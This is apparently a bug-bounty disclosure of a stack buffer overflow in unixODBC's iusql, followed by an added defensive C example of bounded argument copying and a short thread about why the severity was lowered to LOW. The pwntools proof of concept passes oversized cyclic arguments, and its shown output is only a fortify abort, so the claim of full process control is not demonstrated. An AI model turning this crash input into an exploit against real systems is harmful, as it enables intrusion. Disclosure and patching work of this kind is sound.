classic overflow on the stack, with the ability to intercept control. in lurcher/unixodbc
May 31st 2022
If arguments longer than 1024 are passed to the program iusql, we get a classic stack overflow.
Proof of Concept
I removed the docking check to reduce the PoC; this check did not show overflow protection.

```shell
git clone https://github.com/lurcher/unixODBC.git 123
sed -i 's/^.*if ( .*phEnv, phDbc ) != SQL_SUCCESS/if(0/g' 123/exe/iusql.c
```

```python
import os
os.environ['PWNLIB_NOTERM'] = '1'
os.environ['JUPYTER_DETECTED'] = 'yes'
from pwn import *

# argv[0] is the patched binary, argv[1..3] are 1024-byte cyclic patterns
a = ['A'] * 4
a[0] = '123/exe/iusql'
a[1] = cyclic(1024)
a[2] = cyclic(1024)
a[3] = cyclic(1024)
ex = process(argv=a)
ex.interactive()
```

```text
[x] Starting local process '123/exe/iusql'
[+] Starting local process '123/exe/iusql': pid 25548
[*] Switching to interactive mode
*** buffer overflow detected ***: /content/123/exe/.libs/iusql terminated
```
When overflowing, control is seized, allowing the establishment of full control over the process.
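An added example, not code from the report or from unixODBC: the bug class the report describes reduced to a bounded argument copy that refuses oversized input instead of writing past a fixed stack buffer. The 1024 buffer size and the three-argument shape come from the report; the function names are hypothetical.

```c
#include <stdlib.h>
#include <string.h>
/* 1024 is the argument length at which the report's PoC overflows; the
 * names below are hypothetical and not taken from iusql's source. */
#define ARG_BUF 1024
/* The crash pattern: strcpy(buf, argv[i]) into char buf[ARG_BUF] on the
 * stack. With _FORTIFY_SOURCE glibc routes it through __strcpy_chk, which
 * aborts with "*** buffer overflow detected ***" (the PoC's output); an
 * unfortified build overwrites the saved return address instead. The
 * hardened copy below refuses an oversized argument rather than copying it. */
static int copy_arg_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')   /* never scan past dstsz bytes */
        n++;
    if (n >= dstsz)                       /* no room for the terminator */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}
/* Validate every positional argument before any is copied into a fixed
 * buffer; returns how many would have overflowed ARG_BUF. */
static int count_oversized_args(int argc, char **argv)
{
    char buf[ARG_BUF];
    int bad = 0;
    for (int i = 1; i < argc; i++)
        if (copy_arg_checked(buf, sizeof buf, argv[i]) != 0)
            bad++;
    return bad;
}
/* Constructed argv shaped like the PoC's: three 1024-byte arguments
 * (cyclic(1024) in the report), all of which must be refused. */
static int demo_poc_argv(void)
{
    char *big = malloc(ARG_BUF + 1);
    memset(big, 'A', ARG_BUF);
    big[ARG_BUF] = '\0';
    char *argv[] = { "iusql", big, big, big };
    int bad = count_oversized_args(4, argv);
    free(big);
    return bad;                           /* 3 */
}
/* Ordinary short arguments pass the check unchanged. */
static int demo_short_argv(void)
{
    char *argv[] = { "iusql", "dsn", "user", "pw" };
    return count_oversized_args(4, argv);  /* 0 */
}
```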
How can I see why the severity was lowered? In what criteria did I make a mistake? Thanks.
Good afternoon. In this report the developer fixed the level to LOW, but I can't figure out which stats it lowered. The original rating was AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. How can I see the current rating vector?
Hello 👋 The maintainer has hard-set the severity level to LOW irrespective of the vectors, i.e. they generally think that this has a low impact.